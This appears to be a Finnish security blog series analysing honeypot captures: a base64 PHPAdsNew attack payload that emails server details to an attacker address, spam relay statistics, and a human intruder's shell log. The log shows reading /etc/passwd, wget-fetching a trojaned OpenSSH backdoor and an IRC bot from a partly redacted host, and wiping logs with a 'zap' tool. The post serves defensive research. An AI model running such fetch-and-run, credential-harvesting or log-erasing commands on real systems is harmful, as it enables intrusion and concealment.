Jätämme tästä esimerkistä pois tarkan URLin, jota hyökkääjä kokeili, mutta yleisellä tasolla todettakoon että hyökkääjä yritti etsiä haavoittuvaa PHPAdsNew-asennusta.

Latasimme hyökkääjän lähettämästä osoitteesta itse hyökkäyksessä käytetyn tiedoston:

Ylläolevasta kuvasta näkee suhteellisen helposti että kyseessä BASE64-koodattu tiedosto, joka dekoodauksen jälkeen suoritetaan normaalisti eval()-funktion avulla. Alla olevassa kuvassa on dekoodauksen jälkeen näkyville tuleva hyökkäyskoodi:

Kuten huomaamme, koodi sisältä vielä pienen pätkän BASE64-koodattua tietoa, mutta katsotaan ensin mitä hyökkäyskoodi tekee yleisellä tasolla. Hyökkäyskoodi kerää muutamia hyödyllisiä tietoja PHP-ympäristön muuttujista kuten palvelimen nimen ja tiedon siitä onko PHP:n “Safe Mode” aktivoitu vai ei. Nämä tiedot, kuten myös hyväksikäytetyn osoitteen hyökkäyskoodi lähettää sähköpostilla eteenpäin. Vastaanottajan osoite on jäljellä olevassa BASE64-koodatussa tekstinpätkässä:

fr33sh3ll@gmail.com

Joka kerta kun hyökkäyskoodi onnistutaan ajamaan kohdekoneessa saa koodin tekijä sähköpostilla ilmoituksen joka sisältää haavoittuvan palvelimen osoitteen ja tarkan URL-osoitteen haavoittuvaan PHPAdsNew-asennukseen. Tällä tavoin hyökkääjä voi myöhemmin halutessaan käyttää haavoittuvuutta uudelleen hyväkseen ja ajaa kohdekoneessa haluamaansa koodia.

On olemassa useita hyviksi havaittuja ja suositeltuja keinoja hankaloittaa tällaisten hyökkäysten toimintaa kuten asettamalla PHP-tulkissa “Safe Mode” vaihtoehto päälle, tai ottaa allow_url_open tai allow_url_include (riippuu käytössä olevan PHP-kielen versiosta) pois päältä. Enemmän hyviä ohjeita ja vinkkejä PHP-asennusten koventamiseen löytyy esimerkiksi näiltä sivuilta:

There are several ways to make such attacks much harder to perform, like turning on the safe mode or toggling off the allow_url_fopen or allow_url_include (in some versions of php). More good/better tricks can be found for example on these two sites:

http://www.madirish.net/?article=229

http://www.hardened-php.net/

Nyt noin viikko hunajapurkin vastaanottamien ensimmäisten roskapostiviestin jälkeen palasimme tarkistamaan tilatot. Huomasimme kuluneen viikon aikana että ensimmäisen hunajapurkkiin osuneen roskapostittajan lisäksi hunajapurkkiin lähetti roskapostia myös noin 2000 saastuneen koneen vahvuinen bottiverkko.

Tässä hieman päivitettyjä tilastoja viikon ajalta:

Vastaanotimme 309202 roskapostia jotka oli tarkoitettu 3814594 vastaanottajalle, eli käytännössä onnistuimme tutkimuksen yhteydessä estämään 3.8 miljoonan roskapostin välityksen. Taiwanissa sijaitsevien vastaanottajien määrä oli edelleen korkea: 3.8 miljoonasta vastaanottajasta 3.5 miljoonalla oli .tw -päätteinen sähköpostiosoite.

Alla neljä kuvaruutukaappausta tyypillisistä näillä roskaposteilla mainostetuista tuotteista:

Näyttäisi siltä että VideoCD:t (VCD) ovat erittäin suosittuja roskapostiaiheita aasiassa. Emme kuluneen viikon aikana kertaakaan havainnoineet länsimaissa tuttuja aiheita kuten viagraa tai jäljennöskelloja tarjoavia roskaposteja.

Rakensimme tätä tarkoitusta varten hunajapurkin, joka näyttäytyy ulkopuolisille hyökkääjille avoimena välityspalvelimena. Asennuksen jälkeen jouduimme odottamaan noin vuorokauden verran ennen ensimmäisen roskapostittajan saapumista. Ensimmäinen palvelimelle lähetetty viesti ei ollut vielä roskapostia vaan roskapostittajan itselleen lähettämä viesti, jolla he pyrkivät selvittämään onko palvelin oikeasti avoi välityspalvelin. Avoin välityspalvelin sallii sähköpostin välittämisen sellaisiinkin osoitteisiin jotka eivät suoranaisesti kuulu sen toimipiiriin. Tämän takia mustalle listalle joutuu kyseinen välityspalvelin roskapostin takia, eikä poskapostittajien omat järjestelmät.

Ensimmäinen testiviesti näytti tältä:

OUT:       220 <removed> SMTP server ready to serve.
IN :       HELO <removed>
OUT:       250 <removed> Hello <removed>, pleased to meet you.
IN :       MAIL FROM:<k6u5f3s2k5@yahoo.com>
OUT:       250 OK
IN :       RCPT TO:<sseenndd1201@yahoo.com.hk>
OUT:       250 User not local; will forward
IN :       DATA
OUT:       354 Start mail input; end with <CRLF>.<CRLF>
IN :       Subject: Super webscan open relay check succeded, hostname = <removed>
IN :       .
OUT:       250 OK
IN :       QUIT

Koska roskapostittajat eivät luota suoraan palvelimen antamaan lupaukseen välittää viesti jouduimme tämän ensimmäisen koeviestin välittää itse käsin eteenpäin roskapostittajalle, jotta saimme palvelimen näyttämään oikealta välityspalvelimelta. Emme kuitenkaan missään vaiheessa salli viestien automaattista välittämistä, koska silloin myös roskapostit voivat päästä läpi. Ensimmäisen testiviestin välittämisen jälkeen kului ainoastaan 10 minuuttia siihen, että hunajapurkkiimme alkoi virtaamaan oikeata roskapostia jota roskapostittaja yritti saada välitetyksi uhreille.

Kiinnostava yksityiskohtana mainittakoon että kaikki näiden kyseisten roskapostien vastaanottajat sijaitsevat Taiwanissa. Alla joitain tilastoja roskapostiaallon ensimmäiseltä kolmelta tunnilta:

Kaikkiaan kolmen tunnin aikana vastaanotimme 1008 roskapostia jotka oli yritetty lähettää 12877 vastaanottajalle. Keskimäärin yhdeläl roskapostilla oli noin 13 vastaanottajaa. Eristimme roskaposteista yhteensä 990 uniikkia URL-osoitetta, joka osoittivat joko roskapostilla mainostettuun sivustoon taikka viestin runkoon liitettyyn kuvaan.

Yllämainituista 990 URL-osoitteesta eristimme 878 yksilöllistä DNS RR -tunnistetta (domain-osoitetta).

Kaikki vastaanotetut viestit oli kirjoitettu kiinaksi. Valitsimme satunnaisotannalla yhden roskapostin tarkastelun kohteeksi jotta näimme minkätyyppisistä viesteistä on kyse. Kävimme viestissä olleessa URLissa ja näimme tämän:

Kyseessä on Video CD-levyjä tarjoava sivusto. Arvasimme aluksi että kyseiseltä sivustolta olisi mahdollisesti myyty piraattielokuvia tai vastaavia, mutta käänsimme sivuston silti Googlen käännöskoneen avulla:

“Genuine boxed VCD attached 12 teaching manual”

Otsikon perusteella sivusto tarjoaa erinäköisiä opetusvideoita. Siltä varalta, että Google olisi tehnyt virheen otsikon käännöksessä käännätytimme koko sivuston:

VCD1. Received the court summons, notices, judgments, etc. The first time, how to deal with?
VCD2. Improper financial management刷爆cards, and owe to be debt, card slave how to do?
VCD3. Civil unions should pay attention to, it will have to do? Owe not yet been fraud, how to recover the money was owed?
VCD4. On housing transactions, leasing matters Particular attention should be paid, they can not get the rent or a tenant refusing to move out, how to do?
VCD5. Relating to marriage, divorce, adoption, unclaimed, custody, alimony should pay attention to?
VCD6. Related to cases involved in an accident the attention vehicle damage insurance claims, injury claims
VCD7. On the identity card (original copy) used by Notes? Related instruments (promissory notes, checks) of the relevant laws, lost applications, Movements, invasion and occupation?
VCD8. What circumstances a lawyer must be the best? Resolve their legal problems in three steps
VCD9. Bureau of Investigation by the police or interviews, the transcripts for which we should pay attention right?
VCD10. Books on various reconciliation, cut knot book, undertaking contract, agreement, letter of the law?
VCD11. Husband and wife quarrel, family disputes or domestic violence should be how to deal with?
VCD12. Relating to a variety of writing a will, inheritance of the relevant laws? How to make the best use of the township, the city of the functions of the mediation?

Emme ole nähneet aikaisemmin ylläolevan kaltaisia roskaposteja mutta kyseessä on ilmeisesti kulttuuriero Euroopan ja Aasian välillä. Jatkamme hunajapurkin seuraamista jatkossakin ja julkaisemme lisää tilastoja.

Jouduimme odottamaan hyökkääjän saapumista muutaman tunnin ajan järjestelmän aktivoimisesta. Alla hyökkääjän komentoloki, josta olemme piilottaneet ip- ja verkko-osoitteista osan tarkoituksella.

w
cat /etc/passwd
cat /proc/cpuinfo
ls
wget <poistettu>.com/i[BS]sirsky/bkd
tar xzvf bkd
cd ./–/
./inst
ls
mv zap /bin
cd ..
rm -rf bkd
rm -rf ./–/
ls
w
zap <ip.ip.ip.ip>.d
w
ls
ls
cat /etc/hosts
w
ls
ls -a
wget <poistettu>.com/sirsky/code.tgz
tar xzvf code.jpg
[U-ARROW][BS][BS][BS]tgz
cd .n
./start da[BS][BS]adware
cd ..
rm -rf code.tgz
w

Muutamissa komennoissa olleista kirjoitusvirheistä päätellen hyökkääjänä on tällä kerralla ollut ihminen automaattisesti toimivan ohjelman sijaan. Huomionarvoista on myös ‘w’-komennon (‘who’, näyttää järjestelmään sisäänkirjautuneena olevat käyttäjät) tiuha käyttäminen. Hyökkääjä olisi todennäköisesti lopettanut hyökkäyksen kesken jos olisi havainnut toisia käyttäjiä järjestelmässä.

Hyökkääjä on ensin tarkistanut järjestelmään rekisteröityjen käyttäjien listan /etc/passwd tiedostosta, jonka jälkeen hyökkääjä katsoi koneen prosessorin tiedot. Tämän jälkeen hyökkääjä latasi ulkopuolisesta verkkosoitteesta bkd-nimisen paketin, josta lisää alempana.

Paketin asentamisen jälkeen hyökkääjä poisti paketin lähdekoodit ja tämän lisäksi paketin mukana tulleella ‘zap’-ohjelmalla hyökkääjä poisti käyttöjärjestelmän lokeista kaikki tiedot joissa näkyi hänen käyttämänsä IP-osoite.

Seuraavaksi hyökkääjä tarkisti /etc/hosts-tiedoston ilmeisesti siltä varalta että hyväksikäytetty kone olisi sisäverkossa, jolloin hosts-tiedoston sisältö olisi mahdollisesti paljastanut muita hyväksikäytettäviä koneita sisäverkossa.

Tämän jälkeen hyökkääjä latasi samasta ulkopuolisesta verkko-osoitteesta code.tgz-nimisen paketin josta myös alempana lisää. Paketin asentamisen ja aktivoinnin jälkeen hyökkääjä poisti paketin lähdekoodit järjestelmästä. Tässä vaiheessa päätimme että olimme keränneet tarpeeksi dataa ja suljimme hyökkääjän käyttämän etäyhteyden ja irroitimme koneemme verkosta tutkimuksia varten.

Hyökkääjän ensimmäisenä lataama bkd-niminen paketti oli openSSH-ohjelmiston versio, jonne hyökkääjä oli ujuttanut omaa koodiaan mukaan. Hyökkääjä oli muokannut openSSH-ohjelmistoa siten, että se lähettää muiden käyttäjien sisäänkirjautuessa järjestelmään käyttäjien tunnus/salasana -parit sähköpostilla hyökkääjälle. Näitä tunnuksia käyttäen hyökkääjä voi yrittää murtautua myös muihin tietojärjestelmiin. Koodissa oleva takaovi myös takaa hyökkääjälle pääsyn järjestelmään vaikka tietojärjestelmän pääkäyttäjän salasana vaihdettaisiin.

Hyökkääjän toisena lataama paketti on muokattu kopio EnergyMech IRC-botista. Tämän avulla hyökkääjä voi helposti ajaa komentoja hyväksikäytetyssä järjestelmässä IRC-protokollan yli. IRC-botti oli asetettu liittymään tunnetussa julkisessa IRC-verkossa olevalle kanavalle. Kanavalla oli 12 muuta hyväksikäytettyä linux-palvelinta, joista on lähetetty asianosaisille abuse-viestit järjestelmien turvaamista varten.

Jäljitimme hyökkääjän Romaniassa sijaitsevaan kaupunkiin. Löysimme myös muuta dataa jolla hyökkääjä voidaan viranomaisten puolelta tunnistaa, ja nämä tiedot on lähetty Romanian viranomaisille tutkittavaksi. Valitettavasti hyökkääjän tunnistaminen ei kaikissa tapauksissa ole aina mahdollista.

Jatkamme Tunkeilijat-sarjaa tulevaisuudessa, ja pyrimme esittelemään ylläolevan kaltaisia tapauksia enemmänkin.

Aineistot kerätään oikeilta, ainoastaan tätä tarkoitusta varten pystytetyiltä koneilta jotka ovat ainoastaan kyseisen testin ajan toiminnassa ja jatkuvan valvonnan alaisena. Näin voidaan varmistua siitä ettei hyökkääjät pääse käyttämään järjestelmiämme hyväksi muiden tietokoneiden saastuttamisessa.

Käyttämämme tietojärjestelmät on rakennettu siten, ettei hyökkääjä voi havaita olevansa tarkkailun alla.